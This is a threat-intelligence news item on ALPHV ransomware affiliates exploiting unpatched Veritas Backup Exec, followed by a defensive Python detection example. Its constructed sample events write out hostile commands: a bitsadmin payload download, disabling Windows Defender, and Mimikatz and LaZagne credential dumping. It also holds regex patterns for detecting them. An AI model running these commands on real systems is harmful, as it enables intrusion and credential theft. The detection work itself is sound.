2023-04-13

ALPHV Ransomware Attackers Exploit Veritas Backup Exec Software as Gateway to Corporate Networks

Category: Ransomware News | Industry: Global | Level: Tactical | Source: Mandiant

Mandiant researchers have identified the ALPHV (aka BlackCat) ransomware-as-a-service (RaaS) operation exploiting vulnerable Veritas Backup Exec installations since late 2022 to obtain initial access to corporate networks. The affiliates favour three flaws in Veritas's SHA authentication scheme, CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878; Veritas published fixes for all three in March 2021, so the exposed hosts are those still running unpatched builds. Mandiant notes that "On September 23, 2022, a METASPLOIT module was released which exploits these vulnerabilities and creates a session which the threat actor can use to interact with the victim system."

With the METASPLOIT session in hand, the attackers gathered system and network information through internal reconnaissance, dropped their tooling into the victim environment, established command and control, tampered with security configurations such as Windows Defender, and escalated their privileges. Notable tools leveraged by ALPHV affiliates include Advanced IP Scanner and ADRecon for reconnaissance, the Background Intelligent Transfer Service (BITS, via bitsadmin) for tool download, and Mimikatz and LaZagne for credential access. Before deploying the Rust-based ransomware encryptor, the actors added a task to the domain policy to spread the malware across the domain. Mandiant notes that the affiliates' targeting of vulnerable Veritas hosts is concerning, as a "commercial Internet scanning service identified over 8,500 installations of Veritas Backup Exec instances that are currently exposed to the internet, some of which may still be unpatched and vulnerable."

Anvilogic Scenario:

  • BITSadmin Abuse for Host Compromise

Anvilogic Use Cases:

  • BITSadmin Execution
  • Mimikatz Execution
  • Known Credential Dumping Tool Execution
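To make the use cases and the scenario above concrete, here is an added illustration (not Anvilogic's or Mandiant's detection content) that runs use-case rules for the tradecraft described in the report (a bitsadmin download, Defender tampering, Mimikatz and LaZagne execution) over constructed Windows process-creation events, then correlates the per-event matches on each host into the BITSadmin scenario. The event format, host and user names, paths and the URL are constructed sample data; the Defender-tampering rule is an addition beyond the three listed use cases, and the Mimikatz rule keys on module syntax so that a renamed binary is still caught.

```python
"""Added example, not Anvilogic's or Mandiant's detection logic: toy use-case
rules plus one host-level scenario over constructed process-creation events."""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample events (not from the report):
# timestamp|host|user|parent_image|image|command_line
SAMPLE_EVENTS = r"""
2023-01-10T02:11:04|BKUP01|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\bitsadmin.exe|bitsadmin /transfer job1 /download /priority high http://203.0.113.5/x.exe C:\ProgramData\x.exe
2023-01-10T02:13:30|BKUP01|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"
2023-01-10T02:20:51|BKUP01|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\ProgramData\x.exe|x.exe "privilege::debug" "sekurlsa::logonpasswords" exit
2023-01-10T02:25:17|BKUP01|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\ProgramData\laZagne.exe|laZagne.exe all
2023-01-10T09:00:00|WS042|CORP\alice|C:\Windows\explorer.exe|C:\Windows\System32\bitsadmin.exe|bitsadmin /list /allusers
2023-01-11T08:30:00|WS017|CORP\bob|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|"WINWORD.EXE" report.docx
""".strip()


@dataclass
class Event:
    ts: datetime
    host: str
    user: str
    parent: str
    image: str
    cmdline: str

    @property
    def image_name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    """Parse the pipe-delimited sample format into Event objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, parent, image, cmdline = line.split("|", 5)
        events.append(Event(datetime.fromisoformat(ts), host, user, parent, image, cmdline))
    return events


# Use-case rules; names mirror the use cases listed above. Switch and module
# syntax is the public syntax of the tools, the rules themselves are ours.
BITS_DOWNLOAD = re.compile(r"/(transfer|addfile|create)\b", re.I)
URL = re.compile(r"https?://", re.I)
# Mimikatz module syntax catches a renamed binary (x.exe above), not only mimikatz.exe
MIMIKATZ = re.compile(r"mimikatz|sekurlsa::|lsadump::|privilege::debug", re.I)
LAZAGNE = re.compile(r"lazagne", re.I)
DEFENDER_TAMPER = re.compile(
    r"Set-MpPreference\s+-Disable\w*Monitoring|Add-MpPreference\s+-ExclusionPath", re.I)


def evaluate(ev: Event) -> list:
    """Return the use-case names matched by one event (empty list if none)."""
    cases = []
    blob = ev.image + " " + ev.cmdline
    # Only download-capable bitsadmin switches with a URL; /list, /info stay quiet to cut noise
    if ev.image_name == "bitsadmin.exe" and BITS_DOWNLOAD.search(ev.cmdline) and URL.search(ev.cmdline):
        cases.append("BITSadmin Execution")
    if DEFENDER_TAMPER.search(ev.cmdline):
        cases.append("Defender Tampering")
    if MIMIKATZ.search(blob):
        cases.append("Mimikatz Execution")
    if LAZAGNE.search(blob):
        cases.append("Known Credential Dumping Tool Execution")
    return cases


WINDOW = timedelta(hours=24)


def correlate(hits: list) -> list:
    """Scenario 'BITSadmin Abuse for Host Compromise': a bitsadmin download
    followed on the same host, within WINDOW, by any other matched use case."""
    by_host = defaultdict(list)
    for ev, cases in hits:
        by_host[ev.host].append((ev, cases))
    scenarios = []
    for host, items in by_host.items():
        items.sort(key=lambda pair: pair[0].ts)
        for i, (ev, cases) in enumerate(items):
            if "BITSadmin Execution" not in cases:
                continue
            followups = [c for later, later_cases in items[i + 1:]
                         if later.ts - ev.ts <= WINDOW
                         for c in later_cases if c != "BITSadmin Execution"]
            if followups:
                scenarios.append({"host": host, "start": ev.ts, "followups": followups})
    return scenarios


def run(text: str):
    """Evaluate every event, keep the ones that matched, and build scenarios."""
    hits = []
    for ev in parse_events(text):
        cases = evaluate(ev)
        if cases:
            hits.append((ev, cases))
    return hits, correlate(hits)


if __name__ == "__main__":
    hits, scenarios = run(SAMPLE_EVENTS)
    for ev, cases in hits:
        print(f"{ev.ts} {ev.host} {ev.image_name}: {', '.join(cases)}")
    for s in scenarios:
        print(f"SCENARIO BITSadmin Abuse for Host Compromise on {s['host']} "
              f"from {s['start']}: {' -> '.join(s['followups'])}")
```

On the sample data the benign bitsadmin /list on WS042 and the Word launch on WS017 produce no hits, while BKUP01 yields four use-case matches that chain into one scenario. In a real pipeline the per-event rules would be much noisier than this (bitsadmin has legitimate administrative use), which is exactly why the host-level chaining is the alert worth paging on.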